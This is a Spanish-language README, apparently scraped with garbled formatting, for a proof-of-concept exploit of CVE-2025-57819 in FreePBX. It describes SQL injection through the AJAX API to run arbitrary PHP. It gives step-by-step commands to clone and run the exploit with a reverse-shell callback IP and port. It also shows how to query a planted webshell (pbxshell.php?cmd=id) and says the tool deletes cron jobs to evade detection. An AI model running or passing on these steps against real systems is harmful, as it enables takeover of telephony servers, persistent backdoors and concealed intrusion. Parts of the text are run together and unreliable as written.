
Exploit de prueba de concepto para CVE-2025-57819 en FreePBX: inyección SQL en la API AJAX para ejecutar PHP arbitrario, crear una webshell persistente y lanzar una shell inversa.
Este script explota una vulnerabilidad en versiones de FreePBX anteriores a 16.0.26.0 (CVE-2025-57819), permitiendo a atacantes remotos ejecutar código PHP arbitrario a través de una falla de inyección SQL en el endpoint de la API AJAX. El exploit crea tanto una webshell como una reverse shell de activación automática.
/admin/ajax.php)/pbxshell.phprequestsgit clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT
-H HOST: Instancia de FreePBX objetivo (p. ej., https://freepbx.example.com)-lhost LHOST: Tu IP para el callback de la reverse shell-lport LPORT: Puerto para la conexión de la reverse shellpython3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444
Después de una explotación exitosa, accede a la webshell mediante:
curl -X GET "http://TARGET/pbxshell.php?cmd=id"
El exploit elimina automáticamente las tareas cron después de la ejecución para evitar la detección.
-- para comentar la sintaxis SQL restante/var/www/html/